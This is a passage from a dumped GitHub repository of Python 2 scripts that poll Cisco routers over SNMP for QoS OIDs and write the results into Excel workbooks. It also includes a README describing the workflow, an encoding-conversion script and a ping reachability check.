\tsheet.cell(row=fila,column=3).border=thin_border\n\t\t\t# \tsheet.cell(row=fila,column=4).border=thin_border\n\n\t\t\t# \tfila+=1\n\n\t\t\t# \tsheet.cell(row=fila,column=1).value=diccionarios[0][key][1]\n\t\t\t# \tqospolicycontrol+=1\n\t\t\t# \tsheet.merge_cells(start_row=fila,start_column=1, end_row=fila, end_column=4)\n\t\t\t# \tsheet.cell(row=fila,column=1).font=titlefont\n\t\t\t# \tsheet.cell(row=fila,column=1).fill=titlecolor\n\t\t\t# \tsheet.cell(row=fila,column=1).alignment=cellalignment\n\t\t\t# \tsheet.row_dimensions[fila].height=20\n\t\t\t# \tsheet.cell(row=fila,column=1).border=thin_border\n\t\t\t# \tsheet.cell(row=fila,column=2).border=thin_border\n\t\t\t# \tsheet.cell(row=fila,column=3).border=thin_border\n\t\t\t# \tsheet.cell(row=fila,column=4).border=thin_border\n\n\t\t\t# \tfila+=1\n\n\t\t\t# \tsheet.cell(row=fila,column=1).value='INTERFAZ CONTROL PLANE O VLAN - NO SE INCLUYEN OIDS'\n\t\t\t# \tsheet.merge_cells(start_row=fila,start_column=1, end_row=fila, end_column=4)\n\t\t\t# \tsheet.cell(row=fila,column=1).font=secondfont\n\t\t\t# \tsheet.cell(row=fila,column=1).fill=secondcolor\n\t\t\t# \tsheet.cell(row=fila,column=1).alignment=cellalignment\n\t\t\t# \tsheet.cell(row=fila,column=1).border=thin_border\n\t\t\t# \tsheet.cell(row=fila,column=2).border=thin_border\n\t\t\t# \tsheet.cell(row=fila,column=3).border=thin_border\n\t\t\t# \tsheet.cell(row=fila,column=4).border=thin_border\n\n\t\t\t# \tfila+=1\n\n\t\t\t#OLD STATEMENT\n\t\t\t# if diccionarios[0][key][0]==diccionarios[1][item][1] and (diccionarios[0][key][1]!='Control Plane' and 'Vlan' not in diccionarios[0][key][1]):\n\t\t\tif diccionarios[0][key][0]==diccionarios[1][item][1]:\n\n\t\t\t\tsheet.cell(row=fila,column=1).value=host+' - '+diccionarios[8]['value1'][0]\n\t\t\t\tsheet.merge_cells(start_row=fila,start_column=1, end_row=fila, end_column=3)\n\t\t\t\tsheet.cell(row=fila,column=1).font=titlefont\n\t\t\t\tsheet.cell(row=fila,column=1).fill=titlecolor\n\t\t\t\tsheet.cell(row=fila,column=1).alignment=cellalignment\n\t\t\t\tsheet.row_dimensions[fila].height=20\n\t\t\t\tsheet.cell(row=fila,column=1).border=thin_border\n\t\t\t\tsheet.cell(row=fila,column=2).border=thin_border\n\t\t\t\tsheet.cell(row=fila,column=3).border=thin_border\n\t\t\t\t# sheet.cell(row=fila,column=4).border=thin_border\n\n\t\t\t\tfila+=1\n\n\t\t\t\tsheet.cell(row=fila,column=1).value=diccionarios[0][key][1]\n\t\t\t\tqospolicycontrol+=1\n\t\t\t\tsheet.merge_cells(start_row=fila,start_column=1, end_row=fila, end_column=3)\n\t\t\t\tsheet.cell(row=fila,column=1).font=titlefont\n\t\t\t\tsheet.cell(row=fila,column=1).fill=titlecolor\n\t\t\t\tsheet.cell(row=fila,column=1).alignment=cellalignment\n\t\t\t\tsheet.row_dimensions[fila].height=20\n\t\t\t\tsheet.cell(row=fila,column=1).border=thin_border\n\t\t\t\tsheet.cell(row=fila,column=2).border=thin_border\n\t\t\t\tsheet.cell(row=fila,column=3).border=thin_border\n\t\t\t\t# sheet.cell(row=fila,column=4).border=thin_border\n\n\t\t\t\tfila+=1\n\n\t\t\t\tsheet.cell(row=fila,column=1).value='Class-Map'\n\t\t\t\tsheet.cell(row=fila,column=1).font=secondfont\n\t\t\t\tsheet.cell(row=fila,column=1).fill=secondcolor\n\t\t\t\tsheet.cell(row=fila,column=1).alignment=cellalignment\n\t\t\t\tsheet.cell(row=fila,column=1).border=thin_border\n\n\t\t\t\tsheet.cell(row=fila,column=3).value='OID'\n\t\t\t\tsheet.cell(row=fila,column=3).font=secondfont\n\t\t\t\tsheet.cell(row=fila,column=3).fill=secondcolor\n\t\t\t\tsheet.cell(row=fila,column=3).alignment=cellalignment\n\t\t\t\tsheet.cell(row=fila,column=3).border=thin_border\n\n\t\t\t\tsheet.cell(row=fila,column=2).value='Descripcion de OID'\n\t\t\t\tsheet.cell(row=fila,column=2).font=secondfont\n\t\t\t\tsheet.cell(row=fila,column=2).fill=secondcolor\n\t\t\t\tsheet.cell(row=fila,column=2).alignment=cellalignment\n\t\t\t\tsheet.cell(row=fila,column=2).border=thin_border\n\n\t\t\t\t# sheet.cell(row=fila,column=4).value='Valor Muestra de cada OID'\n\t\t\t\t# sheet.cell(row=fila,column=4).font=secondfont\n\t\t\t\t# sheet.cell(row=fila,column=4).fill=secondcolor\n\t\t\t\t# sheet.cell(row=fila,column=4).alignment=cellalignment\n\t\t\t\t# sheet.cell(row=fila,column=4).border=thin_border\n\n\t\t\t\tfila+=1\n\n\t\t\t\t#los segundos dos ciclos y el if escriben buscan en base a la informacion de QOS e indices de interfaz\n\t\t\t\t#Imprimen lo mas relevante en el archivo de texto\n\n\n\t\t\t\tcorevar=0\n\t\t\t\tfor text in diccionarios[2]:\n\t\t\t\t\tfor more in diccionarios[3]:\n\t\t\t\t\t\tif diccionarios[1][item][0] == diccionarios[3][more][0].split('.')[0] and diccionarios[2][text][0]==diccionarios[3][more][1]:\n\t\t\t\t\t\t\tfor finalvalue in diccionarios[4]:\n\t\t\t\t\t\t\t\tif diccionarios[4][finalvalue][0]==diccionarios[3][more][0]:\n\t\t\t\t\t\t\t\t\tif diccionarios[2][text][1] in interestingclasses: \n\t\t\t\t\t\t\t\t\t\tcorevar+=1\n\t\t\t\t\t\t\t\t\tsheet.cell(row=fila,column=1).value=diccionarios[2][text][1]\n\t\t\t\t\t\t\t\t\tsheet.cell(row=fila,column=1).fill=cellcolor\n\t\t\t\t\t\t\t\t\tsheet.cell(row=fila,column=1).border=thin_border\n\t\t\t\t\t\t\t\t\tsheet.cell(row=fila,column=3).value='1.3.6.1.4.1.9.9.166.1.15.1.1.6.'+diccionarios[3][more][0]\n\t\t\t\t\t\t\t\t\tsheet.cell(row=fila,column=3).fill=cellcolor\n\t\t\t\t\t\t\t\t\tsheet.cell(row=fila,column=3).border=thin_border\n\t\t\t\t\t\t\t\t\tsheet.cell(row=fila,column=2).value='Contador de Bytes PRE-Politica'\n\t\t\t\t\t\t\t\t\tsheet.cell(row=fila,column=2).fill=cellcolor\n\t\t\t\t\t\t\t\t\tsheet.cell(row=fila,column=2).border=thin_border\n\t\t\t\t\t\t\t\t\t# sheet.cell(row=fila,column=4).value=diccionarios[4][finalvalue][1]\n\t\t\t\t\t\t\t\t\t# sheet.cell(row=fila,column=4).fill=cellcolor\n\t\t\t\t\t\t\t\t\t# sheet.cell(row=fila,column=4).border=thin_border\n\n\t\t\t\t\t\t\t\t\tfila+=1\n\n\t\t\t\t\t\t\t\t\tif diccionarios[2][text][1] in interestingclasses:\n\t\t\t\t\t\t\t\t\t\tcorevar+=1\n\t\t\t\t\t\t\t\t\tsheet.cell(row=fila,column=1).value=diccionarios[2][text][1]\n\t\t\t\t\t\t\t\t\tsheet.cell(row=fila,column=1).fill=cellcolor\n\t\t\t\t\t\t\t\t\tsheet.cell(row=fila,column=1).border=thin_border\n\t\t\t\t\t\t\t\t\tsheet.cell(row=fila,column=3).value='1.3.6.1.4.1.9.9.166.1.15.1.1.10.'+diccionarios[3][more][0]\n\t\t\t\t\t\t\t\t\tsheet.cell(row=fila,column=3).fill=cellcolor\n\t\t\t\t\t\t\t\t\tsheet.cell(row=fila,column=3).border=thin_border\n\t\t\t\t\t\t\t\t\tsheet.cell(row=fila,column=2).value='Contador de Bytes POST-Politica'\n\t\t\t\t\t\t\t\t\tsheet.cell(row=fila,column=2).fill=cellcolor\n\t\t\t\t\t\t\t\t\tsheet.cell(row=fila,column=2).border=thin_border\n\t\t\t\t\t\t\t\t\t# sheet.cell(row=fila,column=4).value=diccionarios[6][finalvalue][1]\n\t\t\t\t\t\t\t\t\t# sheet.cell(row=fila,column=4).fill=cellcolor\n\t\t\t\t\t\t\t\t\t# sheet.cell(row=fila,column=4).border=thin_border\n\t\t\t\t\t\t\t\t\tfila+=1\n\n\t\t\t\t#SEQUENCE FOR QUEUEING OIDs\n\t\t\t\t# for text in diccionarios[10]:\n\t\t\t\t# \tfor finalvalue in diccionarios[11]:\n\t\t\t\t# \t\tif diccionarios[11][finalvalue][0]==diccionarios[10][text][0] and diccionarios[10][text][0].split('.')[0]==diccionarios[1][item][0]:\n\t\t\t\t# \t\t\t# print diccionarios[10][text][3], diccionarios[12][finalvalue][0], diccionarios[12][finalvalue][1]\n\t\t\t\t# \t\t\tif diccionarios[10][text][3] in interestingclasses: \n\t\t\t\t# \t\t\t\t\tcorevar+=1\n\t\t\t\t# \t\t\tsheet.cell(row=fila,column=2).value=diccionarios[10][text][3]\n\t\t\t\t# \t\t\tsheet.cell(row=fila,column=2).fill=cellcolor\n\t\t\t\t# \t\t\tsheet.cell(row=fila,column=2).border=thin_border\n\t\t\t\t# \t\t\tsheet.cell(row=fila,column=3).value='1.3.6.1.4.1.9.9.166.1.18.1.1.2.'+diccionarios[12][finalvalue][0]\n\t\t\t\t# \t\t\tsheet.cell(row=fila,column=3).fill=cellcolor\n\t\t\t\t# \t\t\tsheet.cell(row=fila,column=3).border=thin_border\n\t\t\t\t# \t\t\tsheet.cell(row=fila,column=1).value='Maxima cantidad de paquetes en cola'\n\t\t\t\t# \t\t\tsheet.cell(row=fila,column=1).fill=cellcolor\n\t\t\t\t# \t\t\tsheet.cell(row=fila,column=1).border=thin_border\n\t\t\t\t# \t\t\tsheet.cell(row=fila,column=4).value=diccionarios[12][finalvalue][1]\n\t\t\t\t# \t\t\tsheet.cell(row=fila,column=4).fill=cellcolor\n\t\t\t\t# \t\t\tsheet.cell(row=fila,column=4).border=thin_border\n\n\t\t\t\t# \t\t\tfila+=1\n\n\t\t\t\t# \t\t\t# print diccionarios[10][text][3], diccionarios[11][finalvalue][0], diccionarios[11][finalvalue][1]\n\t\t\t\t# \t\t\tif diccionarios[10][text][3] in interestingclasses: \n\t\t\t\t# \t\t\t\t\tcorevar+=1\n\t\t\t\t# \t\t\tsheet.cell(row=fila,column=2).value=diccionarios[10][text][3]\n\t\t\t\t# \t\t\tsheet.cell(row=fila,column=2).fill=cellcolor\n\t\t\t\t# \t\t\tsheet.cell(row=fila,column=2).border=thin_border\n\t\t\t\t# \t\t\tsheet.cell(row=fila,column=3).value='1.3.6.1.4.1.9.9.166.1.18.1.1.1.'+diccionarios[11][finalvalue][0]\n\t\t\t\t# \t\t\tsheet.cell(row=fila,column=3).fill=cellcolor\n\t\t\t\t# \t\t\tsheet.cell(row=fila,column=3).border=thin_border\n\t\t\t\t# \t\t\tsheet.cell(row=fila,column=1).value='Actual cantidad de paquetes en cola'\n\t\t\t\t# \t\t\tsheet.cell(row=fila,column=1).fill=cellcolor\n\t\t\t\t# \t\t\tsheet.cell(row=fila,column=1).border=thin_border\n\t\t\t\t# \t\t\tsheet.cell(row=fila,column=4).value=diccionarios[11][finalvalue][1]\n\t\t\t\t# \t\t\tsheet.cell(row=fila,column=4).fill=cellcolor\n\t\t\t\t# \t\t\tsheet.cell(row=fila,column=4).border=thin_border\n\n\t\t\t\t# \t\t\tfila+=1\n\t\t\t\t# \t\t\t# print diccionarios[10][text][3], diccionarios[13][finalvalue][0], diccionarios[13][finalvalue][1]\n\t\t\t\t# \t\t\tif diccionarios[10][text][3] in interestingclasses: \n\t\t\t\t# \t\t\t\t\tcorevar+=1\n\t\t\t\t# \t\t\tsheet.cell(row=fila,column=2).value=diccionarios[10][text][3]\n\t\t\t\t# \t\t\tsheet.cell(row=fila,column=2).fill=cellcolor\n\t\t\t\t# \t\t\tsheet.cell(row=fila,column=2).border=thin_border\n\t\t\t\t# \t\t\tsheet.cell(row=fila,column=3).value='1.3.6.1.4.1.9.9.166.1.18.1.1.5.'+diccionarios[13][finalvalue][0]\n\t\t\t\t# \t\t\tsheet.cell(row=fila,column=3).fill=cellcolor\n\t\t\t\t# \t\t\tsheet.cell(row=fila,column=3).border=thin_border\n\t\t\t\t# \t\t\tsheet.cell(row=fila,column=1).value='Cantidad de Bytes descartados por cola'\n\t\t\t\t# \t\t\tsheet.cell(row=fila,column=1).fill=cellcolor\n\t\t\t\t# \t\t\tsheet.cell(row=fila,column=1).border=thin_border\n\t\t\t\t# \t\t\tsheet.cell(row=fila,column=4).value=diccionarios[13][finalvalue][1]\n\t\t\t\t# \t\t\tsheet.cell(row=fila,column=4).fill=cellcolor\n\t\t\t\t# \t\t\tsheet.cell(row=fila,column=4).border=thin_border\n\n\t\t\t\t# \t\t\tfila+=1\n\t\t\t\t\t\t\t# pass\n\t\t\t\t\n\t\t\t\t#WHEN INCLUDING QUEUEING OIDs corevar is checked for 32 and 34 rows are subtracted from fila to write Core-MPLS\n\t\t\t\tif corevar==14:\n\t\t\t\t\tsheet.cell(row=fila-16,column=1).value=diccionarios[0][key][1]+' - Core-MPLS'\n\t\t\t\tfor i in range (0,5):\n\t\t\t\t\tsheet.cell(row=fila+i,column=1).value=''\t\t\t\n\treturn fila\n\n#Funcion para escribir los OIDs de cada Class-map en los archivos de texto\ndef appendoids(archivo,filaultimate):\n\t#Guarda la informacion de los OID obtenidos en la variable results\n\tresults=[]\n\twith open(str(archivo), 'r') as inputfile:\n\t\tfor line in inputfile:\n\t\t\tresults.append(line.strip())\n\n\t#Genera un \"indice\" de donde se encuentra la informacion para cada tipo de OID\n\t#Resultado es una lista donde se expresa cuantas lineas hay en cada OID\n\tindexlist=[]\n\tlast=0\n\tfor i in range (0, len(results)):\n\t\tif \"#\" in results[i]:\n\t\t\tindexlist.append(i-last-3)\n\t\t\tlast=i\n\t#vacia los diccionarios de cada OID\n\thostname={}\n\tifindex={}\n\tifipindex={}\n\tifipindextemp={}\n\tifqosindex={}\n\tifdir={}\n\tpolicymaps={}\n\tclassmaps={}\n\tifclassindex={}\n\tcounterprev={}\n\tgaugeprev={}\n\tcounterpost={}\n\tgaugepost={}\n\tparentclassmaps={}\n\tobjecttype={}\n\tqueueingindex={}\n\tqueueingcurrent={}\n\tqueueingmax={}\n\tqueueingdiscards={}\n\n\n\t#Guarda en cada diccionario la informacion mas relevante de cada OID\n\t#Las keys de cada diccionario empiezan por value1 y aumentan dependiendo de la cantidad de lineas en cada OID\n\t#El ciclo depende de la dimension de cada archivo de texto\n\t#Cada \"if\" se activa con la descripcion que identifica los OID\n\tfor i in range (0,len(results)):\n\t\tif \"#Hostname\" in results[i]:\n\t\t\ttemp=[]\n\t\t\t#ciclo usa la cantidad de lineas de acuerdo a su OID\n\t\t\tfor x in range (0,indexlist[1]):\n\t\t\t\t#primer paso temp separa el string en dos usando el simbolo =\n\t\t\t\ttemp=results[i+x+1].split(\":\")\n\t\t\t\tif len(temp) >=3:\n\t\t\t\t\t#segundo paso guarda el ultimo valor del OID y el valor de la info correspondiente - se limpian los espacios y simbolos extras\n\t\t\t\t\t#en caso de problemas de output imprimir temp antes del if para ver su formato\n\t\t\t\t\ttemp=[temp[0].split(\".\")[-1].strip(),temp[2].strip().strip('\"')]\n\t\t\t\t\thostname[\"value{0}\".format(x+1)]=temp\n\t\tif \"#Indice de las interfaces\" in results[i]:\n\t\t\ttemp=[]\n\t\t\tfor x in range (0,indexlist[2]):\n\t\t\t\ttemp=results[i+x+1].split(\":\")\n\t\t\t\tif len(temp) >=3:\n\t\t\t\t\ttemp=[temp[0].split(\".\")[-1].strip(),temp[2].strip().strip('\"')]\n\t\t\t\t\tifindex[\"value{0}\".format(x+1)]=temp\n\t\tif \"#Indice de IPs e interfaces\" in results[i]:\n\t\t\ttemp=[]\n\t\t\tfor x in range (0,indexlist[3]):\n\t\t\t\ttemp=results[i+x+1].split(\":\")\n\t\t\t\tif len(temp) >=3:\n\t\t\t\t\ttemp=[\".\".join(temp[0].split(\".\")[-4:]),temp[2].strip().strip('\"')]\n\t\t\t\t\tifipindextemp[\"value{0}\".format(x+1)]=temp\n\t\tif \"#Indice de Calidad de Servicio aplicado a cada interfaz\" in results[i]:\n\t\t\ttemp=[]\n\t\t\tfor x in range (0,indexlist[4]):\n\t\t\t\ttemp=results[i+x+1].split(\":\")\n\t\t\t\tif len(temp) >=3:\n\t\t\t\t\ttemp=[temp[0].split(\".\")[-1].strip(),temp[2].strip().strip('\"')]\n\t\t\t\t\tifqosindex[\"value{0}\".format(x+1)]=temp\n\t\tif \"#Direccion en la cual se esta aplicando la politica\" in results[i]:\n\t\t\ttemp=[]\n\t\t\tfor x in range (0,indexlist[5]):\n\t\t\t\ttemp=results[i+x+1].split(\":\")\n\t\t\t\tif len(temp) >=3:\n\t\t\t\t\ttemp=[temp[0].split(\".\")[-1].strip(),temp[2].strip().strip('\"')]\n\t\t\t\t\tifdir[\"value{0}\".format(x+1)]=temp\n\t\tif \"#Policy maps configurados en el equipo\" in results[i]:\n\t\t\ttemp=[]\n\t\t\tfor x in range (0,indexlist[6]):\n\t\t\t\ttemp=results[i+x+1].split(\":\")\n\t\t\t\tif len(temp) >=3:\n\t\t\t\t\ttemp=[temp[0].split(\".\")[-1].strip(),temp[2].strip().strip('\"')]\n\t\t\t\t\tpolicymaps[\"value{0}\".format(x+1)]=temp\n\t\tif \"#Class maps configurados en el equipo\" in results[i]:\n\t\t\ttemp=[]\n\t\t\tfor x in range (0,indexlist[7]):\n\t\t\t\ttemp=results[i+x+1].split(\":\")\n\t\t\t\tif len(temp) >=3:\n\t\t\t\t\ttemp=[temp[0].split(\".\")[-1].strip(),temp[2].strip().strip('\"')]\n\t\t\t\t\tclassmaps[\"value{0}\".format(x+1)]=temp\n\t\tif \"#Indice Parent Classes\" in results[i]:\n\t\t\ttemp=[]\n\t\t\tfor x in range (0,indexlist[8]):\n\t\t\t\ttemp=results[i+x+1].split(\":\")\n\t\t\t\tif len(temp) >=3:\n\t\t\t\t\ttemp=[temp[0].split(\".\")[-2].strip()+'.'+temp[0].split(\".\")[-1].strip(),temp[2].strip().strip('\"')]\n\t\t\t\t\tparentclassmaps[\"value{0}\".format(x+1)]=temp\n\t\tif \"#Indice usando Class-maps e Interfaces\" in results[i]:\n\t\t\ttemp=[]\n\t\t\tfor x in range (0,indexlist[9]):\n\t\t\t\ttemp=results[i+x+1].split(\":\")\n\t\t\t\tif len(temp) >=3:\n\t\t\t\t\ttemp=[temp[0].split(\".\")[-2].strip()+'.'+temp[0].split(\".\")[-1].strip(),temp[2].strip().strip('\"')]\n\t\t\t\t\tifclassindex[\"value{0}\".format(x+1)]=temp\n\t\tif \"#Valores del Contador 64 bits - Previo a ejecutar Politicas\" in results[i]:\n\t\t\ttemp=[]\n\t\t\tfor x in range (0,indexlist[10]):\n\t\t\t\ttemp=results[i+x+1].split(\":\")\n\t\t\t\tif len(temp) >=3:\n\t\t\t\t\ttemp=[temp[0].split(\".\")[-2].strip()+'.'+temp[0].split(\".\")[-1].strip(),temp[2].strip().strip('\"')]\n\t\t\t\t\tcounterprev[\"value{0}\".format(x+1)]=temp\n\t\tif \"#Valores del Gauge32 - Previo a ejecutar Politicas\" in results[i]:\n\t\t\ttemp=[]\n\t\t\tfor x in range (0,indexlist[11]):\n\t\t\t\ttemp=results[i+x+1].split(\":\")\n\t\t\t\tif len(temp) >=3:\n\t\t\t\t\ttemp=[temp[0].split(\".\")[-2].strip()+'.'+temp[0].split(\".\")[-1].strip(),temp[2].strip().strip('\"')]\n\t\t\t\t\tgaugeprev[\"value{0}\".format(x+1)]=temp\n\t\tif \"#Valores del Contador 64 bits - Despues a ejecutar Politicas\" in results[i]:\n\t\t\ttemp=[]\n\t\t\tfor x in range (0,indexlist[12]):\n\t\t\t\ttemp=results[i+x+1].split(\":\")\n\t\t\t\tif len(temp) >=3:\n\t\t\t\t\ttemp=[temp[0].split(\".\")[-2].strip()+'.'+temp[0].split(\".\")[-1].strip(),temp[2].strip().strip('\"')]\n\t\t\t\t\tcounterpost[\"value{0}\".format(x+1)]=temp\n\t\tif \"#Valores del Gauge32 - Despues a ejecutar Politicas\" in results[i]:\n\t\t\ttemp=[]\n\t\t\tfor x in range (0,indexlist[13]):\n\t\t\t\ttemp=results[i+x+1].split(\":\")\n\t\t\t\tif len(temp) >=3:\n\t\t\t\t\ttemp=[temp[0].split(\".\")[-2].strip()+'.'+temp[0].split(\".\")[-1].strip(),temp[2].strip().strip('\"')]\n\t\t\t\t\tgaugepost[\"value{0}\".format(x+1)]=temp\n\t\tif \"#Object Type\" in results[i]:\n\t\t\ttemp=[]\n\t\t\tfor x in range (0,indexlist[14]):\n\t\t\t\ttemp=results[i+x+1].split(\":\")\n\t\t\t\tif len(temp) >=3:\n\t\t\t\t\ttemp=[temp[0].split(\".\")[-2].strip()+'.'+temp[0].split(\".\")[-1].strip(),temp[2].strip().strip('\"')]\n\t\t\t\t\tobjecttype[\"value{0}\".format(x+1)]=temp\n\t\tif \"#Queueing current depth\" in results[i]:\n\t\t\ttemp=[]\n\t\t\tfor x in range (0,indexlist[15]):\n\t\t\t\ttemp=results[i+x+1].split(\":\")\n\t\t\t\tif len(temp) >=3:\n\t\t\t\t\ttemp=[temp[0].split(\".\")[-2].strip()+'.'+temp[0].split(\".\")[-1].strip(),temp[2].strip().strip('\"')]\n\t\t\t\t\tqueueingcurrent[\"value{0}\".format(x+1)]=temp\n\t\tif \"#Queueing max depth\" in results[i]:\n\t\t\ttemp=[]\n\t\t\tfor x in range (0,indexlist[16]):\n\t\t\t\ttemp=results[i+x+1].split(\":\")\n\t\t\t\tif len(temp) >=3:\n\t\t\t\t\ttemp=[temp[0].split(\".\")[-2].strip()+'.'+temp[0].split(\".\")[-1].strip(),temp[2].strip().strip('\"')]\n\t\t\t\t\tqueueingmax[\"value{0}\".format(x+1)]=temp\n\t\tif \"#Queueing discards\" in results[i]:\n\t\t\ttemp=[]\n\t\t\tfor x in range (0,indexlist[17]):\n\t\t\t\ttemp=results[i+x+1].split(\":\")\n\t\t\t\tif len(temp) >=3:\n\t\t\t\t\ttemp=[temp[0].split(\".\")[-2].strip()+'.'+temp[0].split(\".\")[-1].strip(),temp[2].strip().strip('\"')]\n\t\t\t\t\tqueueingdiscards[\"value{0}\".format(x+1)]=temp\n\n\n\t#Getting only the loopback\n\tfor key in ifindex:\n\t\tif ifindex[key][1]=='Loopback0':\n\t\t\tfor ip in ifipindextemp:\n\t\t\t\tif ifindex[key][0]==ifipindextemp[ip][1]:\n\t\t\t\t\tifipindex={'value1':[ifipindextemp[ip][0],ifindex[key][0]]}\n\n\n\t#Ciclos para obtener un indice que incluya informacion relevante de las colas \n\t#Como viene presentado en los OID originales no se tiene suficiente infomacion para relacionar los class-maps con cada cola\n\tr=1\n\tfor key in objecttype:\n\t\tfor testvar in parentclassmaps:\n\t\t\tif \tobjecttype[key][0]==parentclassmaps[testvar][0] and objecttype[key][1]=='queueing':\n\t\t\t\tfor index in ifclassindex:\n\t\t\t\t\tif objecttype[key][0]==ifclassindex[index][0]:\n\t\t\t\t\t\tqueueingindex[\"value{0}\".format(r)]=[objecttype[key][0], ifclassindex[index][1], objecttype[key][0].split('.')[0]+'.'+parentclassmaps[testvar][1]]\n\t\t\t\t\t\tr+=1\n\n\tfor key in ifclassindex:\n\t\tfor testvar in classmaps:\n\t\t\tif classmaps[testvar][0]==ifclassindex[key][1]:\n\t\t\t\tfor more in queueingindex:\n\t\t\t\t\tif queueingindex[more][2]==ifclassindex[key][0]:\n\t\t\t\t\t\tqueueingindex[more].append(classmaps[testvar][1])\n\n\n\tdicts=[ifindex,ifqosindex,classmaps,ifclassindex,counterprev,gaugeprev,counterpost,gaugepost,ifipindex,policymaps,queueingindex,queueingcurrent,queueingmax,queueingdiscards]\n\n\n\tfilaultimate = writeexcel(dicts,filaultimate,hostname['value1'][1])+4\n\treturn filaultimate\n\n\n#lista los archivos de texto en el directorio y pasa cada uno por la funcion para aplicar \nprint 'Starting...'\nprint\nwb=openpyxl.load_workbook(\"OID_Guatemala.xlsx\")\nsheet=wb.get_sheet_by_name(\"Sheet1\")\nrow=1\npolicyclass=[]\nclasspolicy=[]\nfor filename in sorted(glob.glob('*.txt')):\n\tprint filename\n\trow=appendoids(filename,row)\nprint\nprint 'Writing to Excel File'\nwb.save('OID_Guatemala.xlsx')\n\n"
},
{
"alpha_fraction": 0.7916910648345947,
"alphanum_fraction": 0.7969573140144348,
"avg_line_length": 93.94444274902344,
"blob_id": "1ce42d265bf427e2998d41843f6744c8b5c7be9f",
"content_id": "c24fcd2daa4972094992f092b3602908ec5f78b4",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 1709,
"license_type": "no_license",
"max_line_length": 208,
"num_lines": 18,
"path": "/README.md",
"repo_name": "ileammontoya/Proyecto-OIDs",
"src_encoding": "UTF-8",
"text": "# Proyecto-OIDs\nScripts for obtaining QOS OIDs on Cisco interfaces.\nThe proyect is a convoluted mess that probably only works in my environment. \nIt was also my first time coding in Python after learning the basics.\n\nThe Process:\n\n1. In a linux machine open the excel QOS_Guatemala.xlsx and populate it with the data of the devices you want to pull information.\n The information needed includes hostname, device IP, IP of SNMP server and the snmp community.\n2. Run the python script PWSGuatemala.py to create a text file with the Powershell lines necesary to pull the devices snmp information required.\n3. Transfer the Powershell SNMP Script Guatemala.txt to a windows server with the permissions requirements to access the SNMP info of the devices. A coding change in the text file will probably be necessary.\n4. Copy the lines of the file from the last point into a Powershell window, this will create a file for each of the devices that were polled.\n5. Because of coding differeces between windows and linux, copy all the files generated in the last point into the directory \"/Excels/Cambio de coding\"\n6. Run the script touft8.py. This script will automatically change the unicode of the files and move them to the /Excels directory.\n7. Run the OIDExcelGuatemala.py script. This will populate the OID_Guatemala.xlsx file with the QOS OIDs for every interface of the routers involved.\n8. This last task is very specific for my requirement at the moment. Run the script Format_OIDExcelGuatemala.py.\n It goes through every interface polled and accoding to certain parameters labels them as an MPLS interface. \n Those interfaces are copied the the last excel file OID-Guatemala_Core-MPLS.xlsx\n"
},
{
"alpha_fraction": 0.726190447807312,
"alphanum_fraction": 0.7351190447807312,
"avg_line_length": 27.08333396911621,
"blob_id": "0ccd39bef55847bb467bab9e667843fbf3dcd498",
"content_id": "6b5001dc4b51aaabce584b606298fafd13092aba",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 336,
"license_type": "no_license",
"max_line_length": 76,
"num_lines": 12,
"path": "/Excels/Cambio de coding/toutf8.py",
"repo_name": "ileammontoya/Proyecto-OIDs",
"src_encoding": "UTF-8",
"text": "import glob\nimport os\n\n# for filename in sorted(glob.glob('*.txt')):\n\nfor filename in sorted(glob.glob('*.txt')):\n\tsourceEncoding='utf-16'\n\ttargetEncoding='utf-8'\n\tsource = open(filename)\n\ttarget = open('/home/ileam/SNMPClaro/Guatemala/Excels/'+filename,'w')\n\n\ttarget.write(unicode(source.read(), sourceEncoding).encode(targetEncoding))"
},
{
"alpha_fraction": 0.5686591267585754,
"alphanum_fraction": 0.591276228427887,
"avg_line_length": 30,
"blob_id": "39102f737b6019bed28b870e2ff574923e2d50e7",
"content_id": "1cbdb6428472ce2c951b98c3a1712d9cad3b3bd1",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 619,
"license_type": "no_license",
"max_line_length": 77,
"num_lines": 20,
"path": "/Prueba Ping Equipos Guatemala.py",
"repo_name": "ileammontoya/Proyecto-OIDs",
"src_encoding": "UTF-8",
"text": "# coding=utf-8\nimport os\nimport stat\nimport openpyxl\nimport subprocess\n\nwb=openpyxl.load_workbook(\"QOS_Guatemala.xlsx\")\nsheet=wb.get_sheet_by_name(\"Sheet1\")\n\nwith open(os.devnull, \"wb\") as limbo:\n\tfor row in range (115,128):\n\t\tip=str(sheet[\"E\"+str(row)].value)\n\t\tprint ip, row\n\t\tresult=subprocess.Popen([\"ping\",\"-i\",\"0.5\",\"-c\", \"3\", \"-n\", \"-W\", \"2\", ip],\n stdout=limbo, stderr=limbo).wait()\n if result:\n \tsheet.cell(row=row,column=6).value=\"Unreachable\"\n else:\n \tsheet.cell(row=row,column=6).value=\"Active\"\nwb.save('QOS_Guatemala.xlsx')"
},
{
"alpha_fraction": 0.7025994062423706,
"alphanum_fraction": 0.7270641922950745,
"avg_line_length": 36.721153259277344,
"blob_id": "fb183442dd52d67814277d119b4a9211092b5865",
"content_id": "52a051256da3a10730016c4a4ab86b4c300ff149",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 3924,
"license_type": "no_license",
"max_line_length": 104,
"num_lines": 104,
"path": "/Excels/Format_OIDExcelGuatemala.py",
"repo_name": "ileammontoya/Proyecto-OIDs",
"src_encoding": "UTF-8",
"text": "# coding=utf-8\nimport os\nimport glob\nimport os\nimport stat\nimport openpyxl\nfrom openpyxl.styles import Font, PatternFill, Border, Alignment, Side\nfrom copy import copy, deepcopy\n\ntitlecolor = PatternFill(fill_type='solid',\n\t\t\t\t\t\tstart_color='FF0000',\n\t\t\t\t\t\tend_color='FF0000')\ntitlefont = Font(size=15,\n\t\t\t\tcolor='FFFFFF')\n\ncellalignment = Alignment(horizontal='center',\n\t\t\t\t\t\t\tvertical='center')\n\nsecondcolor = PatternFill(fill_type='solid',\n\t\t\t\t\t\t\tstart_color='000000',\n\t\t\t\t\t\t\tend_color='000000')\n\nsecondfont = Font(color='FFFFFF')\n\ncellcolor = PatternFill(fill_type='lightGrid',\n\t\t\t\t\t \tstart_color='FFFFFF',\n\t\t\t\t\t \tend_color='FFFFFF')\n\nthin_border = Border(left=Side(style='thin'), \n right=Side(style='thin'), \n top=Side(style='thin'), \n bottom=Side(style='thin'))\n\n\ndef CopyCoreBlock(oldrow,newrow):\n\tfor i in 